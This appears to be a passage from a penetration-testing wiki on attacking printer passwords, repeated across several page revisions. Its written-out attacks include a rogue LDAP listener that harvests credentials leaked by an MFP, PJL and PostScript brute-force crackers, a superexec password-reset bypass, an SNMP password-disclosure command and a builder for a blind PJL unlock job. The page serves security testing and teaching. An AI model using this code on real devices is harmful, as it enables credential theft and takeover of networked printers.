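        _, ver, pos = _read_tlv(op, 0)        # version INTEGER
        _, dn, pos = _read_tlv(op, pos)       # name LDAPDN (OCTET STRING)
        tag, cred, _ = _read_tlv(op, pos)     # authentication: [0] simple OCTET STRING
        if tag != 0x80:
            return None                       # [3] sasl: no cleartext password here
        return (int.from_bytes(mid, "big"), int.from_bytes(ver, "big"),
                dn.decode("utf-8"), cred.decode("utf-8"))
    except (IndexError, UnicodeDecodeError):
        return None


def build_simple_bind(message_id, dn, password):
    """Encode a simple BindRequest (used to construct sample input; an MFP would send this)."""
    bind = (_tlv(0x02, _int(3)) + _tlv(0x04, dn.encode("utf-8"))
            + _tlv(0x80, password.encode("utf-8")))
    return _tlv(0x30, _tlv(0x02, _int(message_id)) + _tlv(0x60, bind))


def build_bind_response(message_id):
    """BindResponse with resultCode success(0), empty matchedDN and diagnosticMessage."""
    body = _tlv(0x0A, b"\x00") + _tlv(0x04, b"") + _tlv(0x04, b"")
    return _tlv(0x30, _tlv(0x02, _int(message_id)) + _tlv(0x61, body))


def serve(host="0.0.0.0", port=389):
    """Rogue LDAP listener: accept one connection, log the bind, answer success."""
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen(1)
        conn, peer = srv.accept()
        with conn:
            bind = parse_simple_bind(conn.recv(4096))
            if bind:
                mid, _, dn, pw = bind
                print(f"{peer[0]} leaked LDAP credentials: dn={dn!r} password={pw!r}")
                conn.sendall(build_bind_response(mid))


if __name__ == "__main__":
    serve()
```

Point the MFP's LDAP server setting at the host running <code>serve()</code> (port 389 needs root or a port redirect), then trigger any action that makes the device authenticate, such as logging in at the panel or searching the address book. If the device only offers LDAPS, the same parser works behind a TLS listener, but then the test also shows whether the MFP verifies the server certificate at all.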
This may include [https://en.wikipedia.org/wiki/Cross-site_request_forgery CSRF] attackers, if the web application running on the printer has no CSRF protection.
Although it is not very common for end-users or even administrators to set or actually know about these passwords, if enabled they can disable some of the attacks discussed in this wiki. Attackers should therefore have a motivation to crack or bypass them if necessary. === PJL === PJL offers the possibility to set a password to lock access to the printer's hard disk and/or control panel. PJL disk lock as shown below is the defense mechanism propagated by HP against PJL file system access, including its known path traversal vulnerabilities <ref>''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c02004333 Security Bulletin HPSBPI02575 SSRT090255 Rev. 1]'', HP Inc., 2010</ref>: @PJL JOB PASSWORD=0 @PJL DEFAULT PASSWORD=12345 @PJL DEFAULT DISKLOCK=ON @PJL DEFAULT CPLOCK=ON PJL passwords however are vulnerable to brute-force attacks because of their limited 16 bit key size as demonstrated by <ref>''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref> who were able to unlock the disk protection within 6 hours in the worst case. With PJL interpreters having gotten faster while the PJL standard was never updated and still limits passwords to numerical values ranging from 1 to 65535 <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 6-21</ref>, cracking time has efficiently decreased. In a test with 20 devices, between 50 and 1,000 passwords could be evaluated per second leading to average cracking times between 30 seconds and 10 minutes. While PJL passwords can be set on various devices, actual disk lock and/or control panel lock is only supported by few printers. It is unclear if the password has any undocumented, proprietary effects on these machines or is just a dummy variable. 
Furthermore, non-compliant with the PJL standard, Brother based devices do not even verify the password to lock or unlock the control panel, rendering it practically useless. '''How to test this attack?''' The ''lock'' and ''unlock'' commands of [[PRET]] can be used to test brute-force attacks against PJL passwords: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> lock 999 PIN protection: ENABLED Panel lock: ON Disk lock: ON printer:/> unlock No PIN given, cracking. PIN protection: DISABLED Panel lock: OFF Disk lock: OFF '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by including all 65535 possible combinations in a single print job. === PostScript === PostScript offers two types of passwords: The ''SystemParamsPassword'' is used to change print job settings like paper size, while the ''StartJobPassword'' is required to exit the server loop and therefore permanently alter the PostScript environment. The ''checkpassword'' operator which takes either an integer or a string as input checks for both passwords at once <ref>''[http://ftp.ktug.org/obsolete/info/adobe/devtechnotes/pdffiles/ps2016.supplement.pdf PostScript Language Reference Manual Supplement for Version 2016]'', Adobe Systems Inc., 1995, p. 194</ref>. The key size is very large: PostScript strings can contain arbitrary ASCII characters and have a maximum length of 65,565 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739</ref> which theoretically allows 524,280 bit passwords. 
On the positive side (from an attackers point of view) brute-force attacks against PostScript passwords can be performed extremely fast because the PostScript interpreter can be programmed to literally crack itself. A simple PostScript password cracker testing for numerical values as passwords is given below: <syntaxhighlight lang=postscript> /min 0 def /max 1000000 def statusdict begin { min 1 max {dup checkpassword {== flush stop} {pop} ifelse} for } stopped pop </syntaxhighlight> Tested printers were capable of performing between 5,000 and 100,000 password verifications per second. Such enormous cracking rates can be achieved because a printer's RIP is highly optimized for fast processing of PostScript code. Brother based devices are exceptions as ''BR-Script'' only accepts one password per second but also checks for the very first character of the password only which effectively limits the key size to 256 characters or 8 bit. As it seems, Kyocera's ''KPDL'' does not support setting permanent PostScript passwords at all. Another approach is to '''bypass PostScript passwords''' by resetting them with Adobe's proprietary ''superexec'' operator. This operator resides in the ''internaldict'' dictionary, which is ‘protected’ by a static, magic password (<code>1183615869</code>, see <ref>''[http://www.tinaja.com/glib/interdic.pdf PostScript’s Internaldict, Superexec & the pdfmark Instruction Set]'', D. Lancaster, 2002</ref>). Wrapping PostScript code into ''superexec'' allows an attacker to ignore various protection mechanisms of the language, which would normally raise an ''invalidaccess'' error. 
This can be used to set PostScript passwords without initially submitting the current password as shown below: <syntaxhighlight lang=postscript> { << /SystemParamsPassword (0) /StartJobPassword (0) >> setsystemparams } 1183615869 internaldict /superexec get exec </syntaxhighlight> '''How to test this attack?''' The ''lock'' and ''unlock'' commands of [[PRET]] can be used to test brute-force attacks against numeric (integer) PostScript passwords or to bypass them with ''superexec'' magic: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> lock 999 printer:/> unlock No password given, cracking. Device unlocked with password: 999 printer:/> lock S0me_Re4lly_g00d_Passw0rd! printer:/> unlock bypass Resetting password to zero with super-secret PostScript magic Device unlocked with password: 0 '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by cracking it in a single print job. == Password Disclosure == === SNMP === Ancient HP printers (manufactured 2003 and earlier) had a bug which allowed an attacker to retrieve the password for the embedded web server through SNMP requests. The vulnerable OID to be requested (''.iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.net-printer.generalDeviceStatus.gdPasswords'') was even documented by HP. Other vendors may have similar SNMP based issues. Penetration testers may find flaws by studying the various publicly available MIBs released by printer manufacturers. 
'''How to test this attack?''' To test this attack against ancient HP printers, the ''snmpset'' tool can be used as shown below: <syntaxhighlight lang=sh> snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0 iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 00 … </syntaxhighlight> Vulnerable devices will return the password in hexadecimal (here: ''AAA''), while newer devices do only respond with zerobytes. '''Who can perform this attack?''' Anyone who can send network packets to port 161/udp of the printer device. === Pass-Back === Another interesting class of attacks is pass-back attacks were ‘an MFP device is directed into authenticating [...] against a rogue system rather than the expected server’ <ref>''[http://foofus.net/goons/percx/praeda/pass-back-attack.pdf Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers]'', D. Heiland and M. Belton, 2011</ref>. This works in setups where a printer/MFP authenticates users via an external [https://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol LDAP] server. Note that the credentials to access the LDAP server are stored on the MFP itself. If the MFP allows an attacker to change the address of the LDAP server while keeping the stored credentials, whenever someone (for example, the attacker itself) tries to authenticate with the MFP, the MFP leaks the original LDAP credentials to the attacker-controlled server. This example shows that passwords resident on printers may not only harm the device itself if integrated into a company's network. Printers and MFPs – which may offer insufficient protection – are therefore a good starting point in network penetration tests. '''How to test this attack?''' Check if you can change printer settings like the LDAP hostname while keeping the old LDAP password. '''Who can perform this attack?''' Usually anyone who can access the printer's embedded web server. 
This may include [https://en.wikipedia.org/wiki/Cross-site_request_forgery CRSF] attacker, if the web application running on the printer has no CSRF protection. ---- c5fb7e01735347eeb85242282c0ab589262d4641 604 575 2017-02-08T13:00:19Z 92.228.38.179 0 wikitext text/x-wiki Printers are commonly deployed with a default password or no initial password at all. In both cases, end-users or administrators have to actively set a password to secure the device. This article discusses generic brute-force attacks against PJL and PostScript passwords as well as model specific password disclosure. == Brute-Force Attacks == Besides credentials leaked from sources like [[File system access|file system]] or [[memory access]], [[#SNMP|SNMP]] and the printer's [[#Pass-Back|embedded web server]], printing languages offer limited passwords protection mechanisms themselves. Breaking such mechanisms has a priority in this wiki because it focuses on printer-specific weaknesses. Furthermore, whilst the routines to set the password for a printer's embedded web server differ from model to model they are standardized for both [[PJL]] and [[PostScript]]. Although it is not very common for end-users or even administrators to set or actually know about these passwords, if enabled they can disable some of the attacks discussed in this wiki. Attackers should therefore have a motivation to crack or bypass them if necessary. === PJL === PJL offers the possibility to set a password to lock access to the printer's hard disk and/or control panel. PJL disk lock as shown below is the defense mechanism propagated by HP against PJL file system access, including its known path traversal vulnerabilities <ref>''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c02004333 Security Bulletin HPSBPI02575 SSRT090255 Rev. 
1]'', HP Inc., 2010</ref>: @PJL JOB PASSWORD=0 @PJL DEFAULT PASSWORD=12345 @PJL DEFAULT DISKLOCK=ON @PJL DEFAULT CPLOCK=ON PJL passwords however are vulnerable to brute-force attacks because of their limited 16 bit key size as demonstrated by <ref>''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref> who were able to unlock the disk protection within 6 hours in the worst case. With PJL interpreters having gotten faster while the PJL standard was never updated and still limits passwords to numerical values ranging from 1 to 65535 <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 6-21</ref>, cracking time has efficiently decreased. In a test with 20 devices, between 50 and 1,000 passwords could be evaluated per second leading to average cracking times between 30 seconds and 10 minutes. While PJL passwords can be set on various devices, actual disk lock and/or control panel lock is only supported by few printers. It is unclear if the password has any undocumented, proprietary effects on these machines or is just a dummy variable. Furthermore, non-compliant with the PJL standard, Brother based devices do not even verify the password to lock or unlock the control panel, rendering it practically useless. '''How to test this attack?''' The ''lock'' and ''unlock'' commands of [[PRET]] can be used to test brute-force attacks against PJL passwords: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> lock 999 PIN protection: ENABLED Panel lock: ON Disk lock: ON printer:/> unlock No PIN given, cracking. PIN protection: DISABLED Panel lock: OFF Disk lock: OFF '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. 
Feedback from the printer is not required because attackers can blindly remove the password protection by including all 65535 possible combinations in a single print job. === PostScript === PostScript offers two types of passwords: The ''SystemParamsPassword'' is used to change print job settings like paper size, while the ''StartJobPassword'' is required to exit the server loop and therefore permanently alter the PostScript environment. The ''checkpassword'' operator which takes either an integer or a string as input checks for both passwords at once <ref>''[http://ftp.ktug.org/obsolete/info/adobe/devtechnotes/pdffiles/ps2016.supplement.pdf PostScript Language Reference Manual Supplement for Version 2016]'', Adobe Systems Inc., 1995, p. 194</ref>. The key size is very large: PostScript strings can contain arbitrary ASCII characters and have a maximum length of 65,565 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739</ref> which theoretically allows 524,280 bit passwords. On the positive side (from an attackers point of view) brute-force attacks against PostScript passwords can be performed extremely fast because the PostScript interpreter can be programmed to literally crack itself. A simple PostScript password cracker testing for numerical values as passwords is given below: <syntaxhighlight lang=postscript> /min 0 def /max 1000000 def statusdict begin { min 1 max {dup checkpassword {== flush stop} {pop} ifelse} for } stopped pop </syntaxhighlight> Tested printers were capable of performing between 5,000 and 100,000 password verifications per second. Such enormous cracking rates can be achieved because a printer's RIP is highly optimized for fast processing of PostScript code. 
Brother based devices are exceptions as ''BR-Script'' only accepts one password per second but also checks for the very first character of the password only which effectively limits the key size to 256 characters or 8 bit. As it seems, Kyocera's ''KPDL'' does not support setting permanent PostScript passwords at all. Another approach is to '''bypass PostScript passwords''' by resetting them with Adobe's proprietary ''superexec'' operator. This operator resides in the ''internaldict'' dictionary, which is ‘protected’ by a static, magic password (<code>1183615869</code>, see <ref>''[http://www.tinaja.com/glib/interdic.pdf PostScript’s Internaldict, Superexec & the pdfmark Instruction Set]'', D. Lancaster, 2002</ref>). Wrapping PostScript code into the operator allows an attacker to bypass various protection mechanisms of the language, which would normally raise an ''invalidaccess'' error. This can be used to set PostScript passwords without initially submitting the current password as shown below: <syntaxhighlight lang=postscript> { << /SystemParamsPassword (0) /StartJobPassword (0) >> setsystemparams } 1183615869 internaldict /superexec get exec </syntaxhighlight> '''How to test this attack?''' The ''lock'' and ''unlock'' commands of [[PRET]] can be used to test brute-force attacks against numeric (integer) PostScript passwords or to bypass them with ''superexec'' magic: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> lock 999 printer:/> unlock No password given, cracking. Device unlocked with password: 999 printer:/> lock S0me_Re4lly_g00d_Passw0rd! printer:/> unlock bypass Resetting password to zero with super-secret PostScript magic Device unlocked with password: 0 '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. 
Feedback from the printer is not required because attackers can blindly remove the password protection by cracking it in a single print job. == Password Disclosure == === SNMP === Ancient HP printers (manufactured 2003 and earlier) had a bug which allowed an attacker to retrieve the password for the embedded web server through SNMP requests. The vulnerable OID to be requested (''.iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.net-printer.generalDeviceStatus.gdPasswords'') was even documented by HP. Other vendors may have similar SNMP based issues. Penetration testers may find flaws by studying the various publicly available MIBs released by printer manufacturers. '''How to test this attack?''' To test this attack against ancient HP printers, the ''snmpset'' tool can be used as shown below: <syntaxhighlight lang=sh> snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0 iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 00 … </syntaxhighlight> Vulnerable devices will return the password in hexadecimal (here: ''AAA''), while newer devices do only respond with zerobytes. '''Who can perform this attack?''' Anyone who can send network packets to port 161/udp of the printer device. === Pass-Back === Another interesting class of attacks is pass-back attacks were ‘an MFP device is directed into authenticating [...] against a rogue system rather than the expected server’ <ref>''[http://foofus.net/goons/percx/praeda/pass-back-attack.pdf Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers]'', D. Heiland and M. Belton, 2011</ref>. This works in setups where a printer/MFP authenticates users via an external [https://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol LDAP] server. Note that the credentials to access the LDAP server are stored on the MFP itself. 
If the MFP allows an attacker to change the address of the LDAP server while keeping the stored credentials, whenever someone (for example, the attacker itself) tries to authenticate with the MFP, the MFP leaks the original LDAP credentials to the attacker-controlled server. This example shows that passwords resident on printers may not only harm the device itself if integrated into a company's network. Printers and MFPs – which may offer insufficient protection – are therefore a good starting point in network penetration tests. '''How to test this attack?''' Check if you can change printer settings like the LDAP hostname while keeping the old LDAP password. '''Who can perform this attack?''' Usually anyone who can access the printer's embedded web server. This may include [https://en.wikipedia.org/wiki/Cross-site_request_forgery CRSF] attacker, if the web application running on the printer has no CSRF protection. ---- e9396df37e48f877594ed155ed002c8c6bbeb5e5 575 317 2017-02-08T10:31:37Z 92.228.38.179 0 /* PostScript */ wikitext text/x-wiki Printers are commonly deployed with a default password or no initial password at all. In both cases, end-users or administrators have to actively set a password to secure the device. This article discusses generic brute-force attacks against PJL and PostScript passwords as well as model specific password disclosure. == Brute-Force Attacks == Besides credentials leaked from sources like [[File system access|file system]] or [[memory access]], [[#SNMP|SNMP]] and the printer's [[#Pass-Back|embedded web server]], printing languages offer limited passwords protection mechanisms themselves. Breaking such mechanisms has a priority in this wiki because it focuses on printer-specific weaknesses. Furthermore, whilst the routines to set the password for a printer's embedded web server differ from model to model they are standardized for both [[PJL]] and [[PostScript]]. 
Although it is not very common for end-users or even administrators to set or actually know about these passwords, if enabled they can disable some of the attacks discussed in this wiki. Attackers should therefore have a motivation to crack or bypass them if necessary. === PJL === PJL offers the possibility to set a password to lock access to the printer's hard disk and/or control panel. PJL disk lock as shown below is the defense mechanism propagated by HP against PJL file system access, including its known path traversal vulnerabilities <ref>''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c02004333 Security Bulletin HPSBPI02575 SSRT090255 Rev. 1]'', HP Inc., 2010</ref>: @PJL JOB PASSWORD=0 @PJL DEFAULT PASSWORD=12345 @PJL DEFAULT DISKLOCK=ON @PJL DEFAULT CPLOCK=ON PJL passwords however are vulnerable to brute-force attacks because of their limited 16 bit key size as demonstrated by <ref>''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref> who were able to unlock the disk protection within 6 hours in the worst case. With PJL interpreters having gotten faster while the PJL standard was never updated and still limits passwords to numerical values ranging from 1 to 65535 <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 6-21</ref>, cracking time has efficiently decreased. In a test with 20 devices, between 50 and 1,000 passwords could be evaluated per second leading to average cracking times between 30 seconds and 10 minutes. While PJL passwords can be set on various devices, actual disk lock and/or control panel lock is only supported by few printers. It is unclear if the password has any undocumented, proprietary effects on these machines or is just a dummy variable. 
Furthermore, non-compliant with the PJL standard, Brother based devices do not even verify the password to lock or unlock the control panel, rendering it practically useless. '''How to test this attack?''' The ''lock'' and ''unlock'' commands of [[PRET]] can be used to test brute-force attacks against PJL passwords: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> lock 999 PIN protection: ENABLED Panel lock: ON Disk lock: ON printer:/> unlock No PIN given, cracking. PIN protection: DISABLED Panel lock: OFF Disk lock: OFF '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by including all 65535 possible combinations in a single print job. === PostScript === PostScript offers two types of passwords: The ''SystemParamsPassword'' is used to change print job settings like paper size, while the ''StartJobPassword'' is required to exit the server loop and therefore permanently alter the PostScript environment. The ''checkpassword'' operator which takes either an integer or a string as input checks for both passwords at once <ref>''[http://ftp.ktug.org/obsolete/info/adobe/devtechnotes/pdffiles/ps2016.supplement.pdf PostScript Language Reference Manual Supplement for Version 2016]'', Adobe Systems Inc., 1995, p. 194</ref>. The key size is very large: PostScript strings can contain arbitrary ASCII characters and have a maximum length of 65,565 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739</ref> which theoretically allows 524,280 bit passwords. 
On the positive side (from an attackers point of view) brute-force attacks against PostScript passwords can be performed extremely fast because the PostScript interpreter can be programmed to literally crack itself. A simple PostScript password cracker testing for numerical values as passwords is given below: <syntaxhighlight lang=postscript> /min 0 def /max 1000000 def statusdict begin { min 1 max {dup checkpassword {== flush stop} {pop} ifelse} for } stopped pop </syntaxhighlight> Tested printers were capable of performing between 5,000 and 100,000 password verifications per second. Such enormous cracking rates can be achieved because a printer's RIP is highly optimized for fast processing of PostScript code. Brother based devices are exceptions as ''BR-Script'' only accepts one password per second but also checks for the very first character of the password only which effectively limits the key size to 256 characters or 8 bit. As it seems, Kyocera's ''KPDL'' does not support setting permanent PostScript passwords at all. '''How to test this attack?''' The ''lock'' and ''unlock'' commands of [[PRET]] can be used to test brute-force attacks against numeric (integer) PostScript passwords: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> lock 999 printer:/> unlock No password given, cracking. Found password: 999 '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by cracking it in a single print job. == Password Disclosure == === SNMP === Ancient HP printers (manufactured 2003 and earlier) had a bug which allowed an attacker to retrieve the password for the embedded web server through SNMP requests. 
The vulnerable OID to be requested (''.iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.net-printer.generalDeviceStatus.gdPasswords'') was even documented by HP. Other vendors may have similar SNMP based issues. Penetration testers may find flaws by studying the various publicly available MIBs released by printer manufacturers. '''How to test this attack?''' To test this attack against ancient HP printers, the ''snmpset'' tool can be used as shown below: <syntaxhighlight lang=sh> snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0 iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 00 … </syntaxhighlight> Vulnerable devices will return the password in hexadecimal (here: ''AAA''), while newer devices do only respond with zerobytes. '''Who can perform this attack?''' Anyone who can send network packets to port 161/udp of the printer device. === Pass-Back === Another interesting class of attacks is pass-back attacks were ‘an MFP device is directed into authenticating [...] against a rogue system rather than the expected server’ <ref>''[http://foofus.net/goons/percx/praeda/pass-back-attack.pdf Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers]'', D. Heiland and M. Belton, 2011</ref>. This works in setups where a printer/MFP authenticates users via an external [https://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol LDAP] server. Note that the credentials to access the LDAP server are stored on the MFP itself. If the MFP allows an attacker to change the address of the LDAP server while keeping the stored credentials, whenever someone (for example, the attacker itself) tries to authenticate with the MFP, the MFP leaks the original LDAP credentials to the attacker-controlled server. This example shows that passwords resident on printers may not only harm the device itself if integrated into a company's network. 
Printers and MFPs – which may offer insufficient protection – are therefore a good starting point in network penetration tests. '''How to test this attack?''' Check if you can change printer settings like the LDAP hostname while keeping the old LDAP password. '''Who can perform this attack?''' Usually anyone who can access the printer's embedded web server. This may include [https://en.wikipedia.org/wiki/Cross-site_request_forgery CRSF] attacker, if the web application running on the printer has no CSRF protection. ---- a6a7f54df879eaadb02af3109b3fa30e019546d4 317 189 2017-01-31T08:51:42Z 84.153.135.37 0 wikitext text/x-wiki Printers are commonly deployed with a default password or no initial password at all. In both cases, end-users or administrators have to actively set a password to secure the device. This article discusses generic brute-force attacks against PJL and PostScript passwords as well as model specific password disclosure. == Brute-Force Attacks == Besides credentials leaked from sources like [[File system access|file system]] or [[memory access]], [[#SNMP|SNMP]] and the printer's [[#Pass-Back|embedded web server]], printing languages offer limited passwords protection mechanisms themselves. Breaking such mechanisms has a priority in this wiki because it focuses on printer-specific weaknesses. Furthermore, whilst the routines to set the password for a printer's embedded web server differ from model to model they are standardized for both [[PJL]] and [[PostScript]]. Although it is not very common for end-users or even administrators to set or actually know about these passwords, if enabled they can disable some of the attacks discussed in this wiki. Attackers should therefore have a motivation to crack or bypass them if necessary. === PJL === PJL offers the possibility to set a password to lock access to the printer's hard disk and/or control panel. 
PJL disk lock as shown below is the defense mechanism propagated by HP against PJL file system access, including its known path traversal vulnerabilities <ref>''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c02004333 Security Bulletin HPSBPI02575 SSRT090255 Rev. 1]'', HP Inc., 2010</ref>. The ''JOB'' command carries the current password (0 on a device without one), ''DEFAULT PASSWORD'' sets the new one, and the two lock variables are then protected by it; subsequent jobs have to supply the correct ''PASSWORD'' in their ''JOB'' command before the printer accepts further ''DEFAULT'' changes:

<syntaxhighlight lang=text>
@PJL JOB PASSWORD=0
@PJL DEFAULT PASSWORD=12345
@PJL DEFAULT DISKLOCK=ON
@PJL DEFAULT CPLOCK=ON
</syntaxhighlight>

PJL passwords however are vulnerable to brute-force attacks because of their limited 16 bit key size, as demonstrated by <ref>''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref>, who were able to unlock the disk protection within six hours in the worst case. PJL interpreters have gotten faster while the PJL standard was never updated and still limits passwords to numerical values ranging from 1 to 65535 <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 6-21</ref>, so cracking time has dropped accordingly. In a test with 20 devices, between 50 and 1,000 passwords could be verified per second, leading to average cracking times between 30 seconds and ten minutes. While PJL passwords can be set on various devices, an actual disk lock and/or control panel lock is only supported by few printers. It is unclear if the password has any undocumented, proprietary effects on these machines or is just a dummy variable. Furthermore, in violation of the PJL standard, Brother based devices do not even verify the password to lock or unlock the control panel, rendering it practically useless.

'''How to test this attack?'''

The ''lock'' and ''unlock'' commands of [[PRET]] can be used to test brute-force attacks against PJL passwords:

<syntaxhighlight lang=text>
./pret.py -q printer pjl
Connection to printer established
Welcome to the pret shell. Type help or ? to list commands.
printer:/> lock 999
PIN protection:  ENABLED
Panel lock:      ON
Disk lock:       ON
printer:/> unlock
No PIN given, cracking.
PIN protection:  DISABLED
Panel lock:      OFF
Disk lock:       OFF
</syntaxhighlight>

'''Who can perform this attack?'''

Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by including all 65535 possible combinations in a single print job.

=== PostScript ===

PostScript offers two types of passwords: the ''SystemParamsPassword'' is required to change system parameters with ''setsystemparams'', while the ''StartJobPassword'' is required to exit the server loop (''startjob''/''exitserver'') and therefore permanently alter the PostScript environment. The ''checkpassword'' operator, which takes either an integer or a string as input, checks against both passwords at once <ref>''[http://ftp.ktug.org/obsolete/info/adobe/devtechnotes/pdffiles/ps2016.supplement.pdf PostScript Language Reference Manual Supplement for Version 2016]'', Adobe Systems Inc., 1995, p. 194</ref>. The key space is very large: PostScript strings can contain arbitrary 8-bit characters and have a maximum length of 65,535 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739</ref>, which theoretically allows 524,280-bit passwords. On the positive side (from an attacker's point of view), brute-force attacks against PostScript passwords can be performed extremely fast because the PostScript interpreter can be programmed to literally crack itself. A simple PostScript password cracker testing numerical values as passwords is given below:

<syntaxhighlight lang=postscript>
/min 0 def
/max 1000000 def
statusdict begin
{
  min 1 max {                 % every integer candidate from min to max
    dup checkpassword         % true if it matches either password
      {== flush stop}         % print the match and leave the loop
      {pop} ifelse
  } for
} stopped pop
</syntaxhighlight>

Tested printers were capable of performing between 5,000 and 100,000 password verifications per second.
Such enormous cracking rates can be achieved because a printer's RIP is highly optimized for fast processing of PostScript code. Brother based devices are the exception, as ''BR-Script'' only accepts one password per second; however, it also checks only the very first character of the password, which effectively reduces the key space to 256 values, or 8 bit. Kyocera's ''KPDL'' apparently does not support permanent PostScript passwords at all.

'''How to test this attack?'''

The ''lock'' and ''unlock'' commands of [[PRET]] can be used to test brute-force attacks against numeric (integer) PostScript passwords:

<syntaxhighlight lang=text>
./pret.py -q printer ps
Connection to printer established
Welcome to the pret shell. Type help or ? to list commands.
printer:/> lock 999
printer:/> unlock
No password given, cracking.
Found password: 999
</syntaxhighlight>

'''Who can perform this attack?'''

Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by cracking it in a single print job.
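Both sections above end on the same observation: the attacker needs no feedback, because a single print job can carry the whole attack. The Python below is an example added to this page (not PRET code) that builds such jobs. ''pjl_blind_unlock_job()'' generates the PJL job that tries every PIN and, for the right one, disables the password and both locks; ''ps_cracker_job()'' generalises the numeric PostScript cracker to arbitrary string candidates (a wordlist), which PRET's ''unlock'' does not handle. The candidate passwords in the docstring are made up; everything else follows the PJL and PostScript semantics described on this page.

```python
"""Builders for the two 'blind' brute-force print jobs described above.

Example code added for this wiki page; it is not part of PRET.  Both
functions return a complete job that can be sent over any channel reaching
the interpreter (port 9100, USB, cross-site printing) without reading the
printer's answers.  Candidate passwords used in the tests are constructed.
"""

UEL = b"\x1b%-12345X"      # Universal Exit Language: frames every PJL job


def pjl_blind_unlock_job(start: int = 1, end: int = 65535) -> bytes:
    """PJL job that disables password, disk lock and panel lock blindly.

    For each candidate PIN the job opens a JOB section carrying that PIN and
    tries to set DEFAULT PASSWORD=0 (0 disables protection per the PJL
    reference) and both locks to OFF.  A wrong PIN leaves the settings
    untouched; the right one applies them.  Covering the full 1..65535 range
    costs a few megabytes of PJL, nothing more."""
    if not 1 <= start <= end <= 65535:
        raise ValueError("PJL passwords are integers in 1..65535")
    parts = [UEL, b"@PJL\r\n"]
    for pin in range(start, end + 1):
        parts.append(
            b"@PJL JOB PASSWORD=%d\r\n"
            b"@PJL DEFAULT PASSWORD=0\r\n"
            b"@PJL DEFAULT DISKLOCK=OFF\r\n"
            b"@PJL DEFAULT CPLOCK=OFF\r\n"
            b"@PJL EOJ\r\n" % pin)
    parts.append(UEL)
    return b"".join(parts)


def ps_string(raw: bytes) -> bytes:
    """Encode raw bytes as a PostScript literal string.

    Parentheses and backslashes are escaped; anything outside printable
    ASCII becomes a \\ddd octal escape, so binary candidates are safe."""
    out = bytearray(b"(")
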